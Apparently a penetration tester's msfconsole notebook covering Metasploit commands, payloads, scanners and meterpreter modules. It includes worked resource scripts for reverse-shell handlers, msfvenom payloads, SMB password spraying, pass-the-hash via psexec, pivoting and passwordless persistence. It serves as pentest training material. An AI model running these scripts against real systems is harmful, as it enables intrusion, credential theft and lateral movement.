# msfconsole
Basic Metasploit flow:
- `use $MODULE_NAME`
- `set $OPTIONS`
- `run`
You can use msfconsole as a shell (commands it doesn't recognise are passed through to the system), but there's no output redirection; use `spool` if you need to capture what a command prints.
## Commands
- `back` - exit the current module
- `db_nmap $FLAGS $IP` - run [[Nmap]] and import the results into the Metasploit DB; all [[Nmap]] `$FLAGS` are supported, but the scan runs with msfconsole's own privileges, so raw-socket scan types (SYN, UDP, OS detection) need msfconsole started as root
- `help` - get Metasploit help (`help $COMMAND` for a single command)
- `history` - display command history
- `hosts` - display known hosts in DB
- `hosts -d` - delete saved hosts from DB (give an address or range to delete selectively)
- `info` - show module information (including exploit target options)
- `jobs` - check the status of background jobs (`jobs -k $ID` kills one)
- `options` / `advanced` - show the current module's options; `advanced` shows the advanced ones (e.g., ReverseListenerBindAddress) that `options` hides
- `run`/`exploit` - run the selected module (the two are aliases)
- `run -j` - run the selected module as a background job
- `search` - search modules; restrict to a particular type of module using the `type:` parameter (e.g., `search type:exploit wordpress`)
- `services` - display services discovered on known hosts in DB
- `sessions` - list open sessions (plain shells as well as [[meterpreter]])
- `sessions -i $SESSION_NUMBER` - interact with session `$SESSION_NUMBER`
- `show auxiliary` - show auxiliary modules, filtered by relevancy if called from within a module
- `show exploits` - show exploit modules
- `show options` - show module options
- `show payloads` - show payload modules, filtered by relevancy if called from within a module
- `spool $FILE` - save all console output to a log file (useful for record-keeping); `spool off` stops logging
- `use` - select a Metasploit module/exploit
- `vulns` - display vulnerabilities discovered on known hosts in DB
- `workspace` - list workspaces; `workspace -a $NAME` creates one and `workspace $NAME` switches to it, keeping database results isolated per engagement
Note that you can also call regular shell commands (ip, ls, etc.) from msfconsole. You can also background processes using `Ctrl + Z` (Metasploit will trap this, so you don't have to worry about backgrounding the entire msfconsole).
## Modules
Module categories:
- Auxiliary (odds-n-ends)
- Encoders (re-encode exploits to thwart signature-based anti-malware solutions)
- Evasion (attempt to directly evade anti-malware solutions)
- Exploits
- NOPS (no-op code that can be used to pad exploits to a needed size)
- Payloads (what you want to run if the exploit is successful; often, but not always, some kind of shell)
- Post (additional post-exploitation tools)
Don't confuse these with Metasploit *plugins*, which are loaded with `load` (e.g., `load nessus`) and extend the console itself rather than being something you `use`.
- **Remember:** For reverse payloads, open up the port Metasploit's going to listen on in your firewall *before* running the exploit. By default this is port 4444 (set with LPORT).
- **Also Remember:** Be sure to set LHOST (and, when applicable, SRVHOST) correctly, even if it's not indicated by the module. Metasploit's guesses about which interface to use aren't always correct... (I find using the explicit IP address works better than specifying the interface device or leaving SRVHOST at the default of 0.0.0.0.)
- **Also *also* Remember:** Sometimes you might find yourself exploiting a service over an [[SSH]] tunnel (for example, a service that isn't exposed externally, attacked in order to elevate your privileges). LHOST is always the address the *target* connects back to, and the target isn't going to connect back through your local end of the [[SSH]] tunnel. Since Metasploit also binds the payload's listener to LHOST by default, this is where the advanced option ReverseListenerBindAddress comes in: typically LHOST will be the remote system you're tunneled into (with an `ssh -R` remote forward delivering the callback to your machine), and ReverseListenerBindAddress will be 127.0.0.1, so the handler listens where the forwarded connection actually arrives.
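As an added example (not part of the original notes), here is the tunnel case above written out as an msfconsole resource script. The addresses are constructed: attacker 10.0.0.5, SSH pivot 192.168.1.10, target 192.168.1.20 with a vulnerable service on port 8080 that only the pivot can reach.

```text
# Added example. Constructed addresses: attacker 10.0.0.5, SSH pivot 192.168.1.10,
# target 192.168.1.20 with a service on 8080 reachable only from the pivot.
# First, from a normal shell on the attacker box (not inside msfconsole):
#   ssh -L 8080:192.168.1.20:8080 -R 4444:127.0.0.1:4444 user@192.168.1.10
# -L: our localhost:8080 now reaches the target's service (what the exploit hits)
# -R: the pivot's port 4444 is forwarded back to our localhost:4444 (the callback path)
#
# Make the callback settings global so every module picks them up.
# LHOST is what the TARGET connects to: the pivot, not us.
setg LHOST 192.168.1.10
setg LPORT 4444
# ...but the handler must listen locally, where the -R forward delivers the connection.
# These are advanced options: "advanced" shows them, "options" does not.
setg ReverseListenerBindAddress 127.0.0.1
setg ReverseListenerBindPort 4444
#
# A stand-alone listener with those settings (e.g. for a payload dropped by hand):
use exploit/multi/handler
set PAYLOAD linux/x64/meterpreter/reverse_tcp
# Confirm before starting: LHOST must read 192.168.1.10 here, not 127.0.0.1
options
advanced
exploit -j
#
# An exploit module inherits the same globals; it additionally needs to be
# pointed at the local end of the -L forward rather than at the target directly:
#   use exploit/...   (whatever fits the service)
#   set RHOSTS 127.0.0.1
#   set RPORT 8080
#   set PAYLOAD linux/x64/meterpreter/reverse_tcp
#   exploit
```

One caveat that bites in practice: sshd binds `-R` forwards to the pivot's loopback interface by default, so the target cannot reach 192.168.1.10:4444 unless the pivot's sshd has `GatewayPorts yes` (or `GatewayPorts clientspecified` together with `-R 0.0.0.0:4444:127.0.0.1:4444`). Check with `ss -ltnp` on the pivot before firing the exploit.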
### Options
The common RHOSTS option accepts IP addresses, ranges, CIDR networks, and even a file with one target per line (specify as `file:/path/to/file.txt`).
Most modules support the ARCH, PAYLOAD, and SESSION options (for specifying target architecture, the payload to deliver, or session number to connect to). However, these are *not* shown when running `show options`.
You can reset individual parameters using `unset`, and reset the entire module using `unset all`.
Equivalent module commands:
- `set -g` = `setg`
- `unset -g` = `unsetg`
- `run` = `exploit`
Some exploit modules implement the `check` command, which attempts to determine if a target is vulnerable without actually exploiting it. Alternately, other modules have a paired auxiliary scanner. Many *don't* have a check at all. YMMV!
## Payloads
Payloads can be divided into:
- Singles (self-contained; also indicated by the use of an `_` separating "shell" from the rest of the payload name, as in `shell_reverse_tcp`)
- Stagers (small applications that establish a connection back to the attacker to download a larger, more complex payload)
- Stages (payloads designed to be downloaded by a stager; also indicated by the use of a `/` separating "shell" from the rest of the payload name, as in `shell/reverse_tcp`)
Payload names follow the OS/ARCHITECTURE/PAYLOAD pattern (ARCHITECTURE is omitted for 32-bit Windows payloads, so `windows/meterpreter/reverse_tcp` is x86 while `windows/x64/meterpreter/reverse_tcp` is x64).
> [!important]
> Many Windows modules default to a 32-bit payload, but an increasing number of things won't work on a 64-bit system from a 32-bit [[meterpreter]] shell. It's probably best to explicitly set the `payload` option to a 64-bit payload unless you *know* that you'll be dealing with a 32-bit system.
List all available payloads using `msfvenom --list payloads` or `show payloads` from within the Metasploit console.
A specific payload can be set in the Metasploit console using `set PAYLOAD full/path/to/payload`.
If you initially get a native shell, use the `post/multi/manage/shell_to_meterpreter` module (or the shortcut `sessions -u $SESSION_NUMBER`) to upgrade to Meterpreter.
> [!note]
> `shell_to_meterpreter` creates a new connection on a new port, by default 4433.
### Scanners
Use `search portscan` to display built-in Metasploit port scanners. Note that msfconsole needs to be run as root for raw-socket scans (SYN and the like) to work - just like [[Nmap]]. That said, in my experience the fancier [[TCP]] scans (for example, SYN) don't work over a VPN... So maybe best to stick with [[Nmap]].
Targeted scanners can be more useful, however:
- The `auxiliary/scanner/discovery/udp_sweep` module will probe for common [[UDP]] services.
- The `auxiliary/scanner/http/http_version` module will give you [HTTP](HTTP.md) server version information.
- The `auxiliary/scanner/smb/smb_login` module will allow you to conduct brute-force and password spraying attacks against SMB logins (Windows or Samba).
Metasploit has a variety of SMB/CIFS scanners too (use `search scanner/smb` to list them), as well as modules for basic enumeration such as `smtp_version`/`smtp_enum` (for [[SMTP]]) and `mysql_sql` (for [[MySQL]], though this seems to just be a thin wrapper around the [[MySQL]] command line client).
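As an added example (not part of the original notes), the DB-driven workflow described in the Commands, Options and Scanners sections, as one msfconsole resource script (`msfconsole -r enum.rc`, or paste it line by line). The workspace name, file paths, the 10.10.10.0/24 range and the spray password are all constructed for the example.

```text
# Added example: DB-driven enumeration in one workspace, as a resource script.
# The 10.10.10.0/24 range, file paths and password are constructed placeholders.
# Isolate this engagement's results and keep a transcript of everything below.
workspace -a acme-internal
spool /root/acme/msf.log
# Scan straight into the DB. -sS (and -sU/-O) need msfconsole started as root.
db_nmap -sS -sV -p- -T4 10.10.10.0/24
hosts
services
# Feed DB results into scanner modules. With a module active, "services -R"
# sets THAT module's RHOSTS to every host offering the listed ports, so the
# order matters: "use" first, then "services ... -R", then "run".
use auxiliary/scanner/http/http_version
services -p 80,443,8080 -R
run
use auxiliary/scanner/smb/smb_version
services -p 445 -R
run
# UDP services are easy to miss with a TCP-only nmap pass.
use auxiliary/scanner/discovery/udp_sweep
set RHOSTS 10.10.10.0/24
run
# Password spraying: one password across a user list, and keep going after a hit.
# RHOSTS can also be read from a file with one target per line.
use auxiliary/scanner/smb/smb_login
set RHOSTS file:/root/acme/smb_hosts.txt
set USER_FILE /root/acme/users.txt
set SMBPass Winter2024
set STOP_ON_SUCCESS false
run
# The DB now holds nmap's results plus what the scanners learned, and any
# working logins from smb_login are recorded as credentials.
services
creds
spool off
```

Because everything lands in the DB, a later session can `workspace acme-internal` and pick up with `hosts`/`services`/`creds` instead of rescanning; the spool file is the record to hand over at the end of the engagement.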
### Exploits
- `exploit/multi/handler` - Catch a shell produced using [[msfvenom]]. Note that you'll need to use `set payload` to tell Metasploit *what* it's catching - for example, `windows/meterpreter/reverse_tcp` (or `windows/x64/meterpreter/reverse_tcp`). Both regular reverse shells and [[meterpreter]] sessions can be caught this way.
- `exploit/windows/smb/psexec` - Call PsExec over SMB (instantiates [[meterpreter]] by default). *Only works if `SMBUser` has admin privileges on the target!*
Note that any Windows module that takes a password (SMBPass and friends) will also accept an NTLM hash in `LM:NT` form (the LM half can be replaced by 32 `0` characters if not available).
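As an added example (not part of the original notes) covering `exploit/multi/handler`, the `shell_to_meterpreter` upgrade from the Payloads section, and the pass-the-hash note above: the attacker address 10.0.0.5, target 10.10.10.20 and the NT hash placeholder are constructed.

```text
# Added example. Constructed: attacker 10.0.0.5, target 10.10.10.20, NT hash placeholder.
# 1. Build a stageless x64 reverse shell (normal shell, not msfconsole):
#    msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.5 LPORT=4444 -f exe -o rev.exe
use exploit/multi/handler
# The handler must be told exactly what it is catching. This must match msfvenom:
# same arch, and "_" (stageless) vs "/" (staged) is not interchangeable.
set PAYLOAD windows/x64/shell_reverse_tcp
set LHOST 10.0.0.5
set LPORT 4444
# Keep listening after the first callback, so one handler serves several hosts.
set ExitOnSession false
exploit -j
# ... rev.exe runs on the target; session 1 (a plain cmd.exe shell) appears ...
#
# 2. Upgrade it. shell_to_meterpreter starts a SECOND handler on LPORT
#    (default 4433), so that port must be open and reachable from the target too.
use post/multi/manage/shell_to_meterpreter
set SESSION 1
set LHOST 10.0.0.5
set LPORT 4433
run
#    (equivalent shortcut from the console: sessions -u 1)
#
# 3. Later, with hashes from hashdump in hand: pass-the-hash via psexec.
#    SMBPass takes LM:NT; 32 zeros stand in for an unknown LM half.
#    SMBUser must be a local admin on the target or psexec will fail.
use exploit/windows/smb/psexec
set RHOSTS 10.10.10.20
set SMBUser Administrator
set SMBPass 00000000000000000000000000000000:<NT hash from hashdump>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.0.0.5
set LPORT 4445
exploit
```

Two things to check when a callback never arrives: `jobs` (is the handler actually listening, and on the expected LHOST/LPORT?) and whether the payload string in msfvenom and in `set PAYLOAD` are character-for-character the same. For the LM half, the well-known empty-LM value `aad3b435b51404eeaad3b435b51404ee` is also accepted in place of the zeros.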
### meterpreter
Potentially useful Metasploit modules to `run` from/besides [[meterpreter]]:
- `post/windows/gather/checkvm` - try to determine if we're in a VM
- `post/multi/recon/local_exploit_suggester` - find possible privilege escalation exploits (can be slow/unreliable on 64-bit architectures)
- `post/windows/gather/enum_shares` - enumerate shares
- `auxiliary/scanner/smb/smb_enumusers_domain` - enumerate SMB domain users (requires existing admin credentials)
- `post/windows/gather/hashdump` - same as the [hashdump command](https://www.utc.edu/sites/default/files/2021-04/4660-lab6.pdf), but pushes the hashes into the Metasploit DB
- `post/windows/gather/smart_hashdump GETSYSTEM=FALSE` - same as the hashdump command, but pushes the hashes into the Metasploit DB and ignores system accounts
- `auxiliary/analyze/crack_windows` - sic [[John the Ripper]] or [[Hashcat]] on [[NTLM hashes]] stored in the Metasploit DB
- `post/windows/manage/enable_rdp` - enable RDP access (requires admin privileges)
- `post/multi/manage/autoroute` - manipulate target routing for pivoting
- `auxiliary/server/socks_proxy` - start a SOCKS proxy
- `exploit/windows/local/persistence` - sets up a persistent agent (you probably want to `set STARTUP SYSTEM`)... *without a password!* Anyone who can reach its callback can take over the host, so note exactly what you planted and remove it at the end of the engagement.
> [!tip]
> It is generally more useful to background [[meterpreter]] and then run these commands through the Metasploit console, as within [[meterpreter]] they need to have all options specified on the "run" command line (in the console you can access help, actually *see* what the options are, etc.).
There seem to be a lot of options for the `post/multi/manage/autoroute` and `auxiliary/server/socks_proxy` modules, but I don't see a way to access them from [[meterpreter]] (it looks like to get help you need to background [[meterpreter]] and use the console).
The advantage of setting up a SOCKS proxy on the target is that you can then use proxychains to route through the target; this can allow you to pivot more deeply into the network that you're attacking. (You probably want to create a custom proxychains.conf file to do this. Fortunately, /etc/proxychains.conf is well documented.)
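As an added example (not part of the original notes), the full pivot described in the last few paragraphs: `autoroute`, a Metasploit-native scan through the route, then `socks_proxy` plus a proxychains configuration for tools outside Metasploit. Session 1 and the internal subnet 10.20.30.0/24 are constructed for the example.

```text
# Added example: pivot through an established meterpreter session (session 1)
# into a constructed internal subnet 10.20.30.0/24 that only the target can reach.
# 1. Tell Metasploit to route that subnet via the session.
use post/multi/manage/autoroute
set SESSION 1
set CMD add
set SUBNET 10.20.30.0
set NETMASK 255.255.255.0
run
#    Equivalent console shorthand: route add 10.20.30.0/24 1
#    Verify:                        route print
#
# 2. Metasploit modules now reach 10.20.30.0/24 through the session, e.g.:
use auxiliary/scanner/portscan/tcp
set RHOSTS 10.20.30.0/24
set PORTS 22,80,445,3389
run
#
# 3. Expose the route as a local SOCKS5 proxy for everything else.
use auxiliary/server/socks_proxy
set SRVHOST 127.0.0.1
set SRVPORT 1080
set VERSION 5
run -j
#
# 4. A minimal proxychains.conf for it (a separate file, outside msfconsole):
#      strict_chain
#      proxy_dns
#      tcp_read_time_out 15000
#      tcp_connect_time_out 8000
#      [ProxyList]
#      socks5 127.0.0.1 1080
#    Then, from a normal shell:
#      proxychains -f ./proxychains.conf nmap -sT -Pn -n -p 445 10.20.30.5
```

Only full TCP connects traverse a SOCKS proxy, so through proxychains nmap must use `-sT -Pn` (no SYN scan, no ICMP ping), and anything UDP simply won't arrive. `route print` and `jobs` are the first things to check when proxied connections hang: the route has to exist for the session that still owns the network, and the proxy job has to be running.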
### CIFS
Metasploit can also enumerate CIFS users using the `auxiliary/scanner/smb/smb_lookupsid` module.
Like [[Nmap]], I've found this to be a bit unreliable on UNIX-like systems.
### MS SQL
![[Metasploit MS SQL modules|spells/Metasploit MS SQL modules]]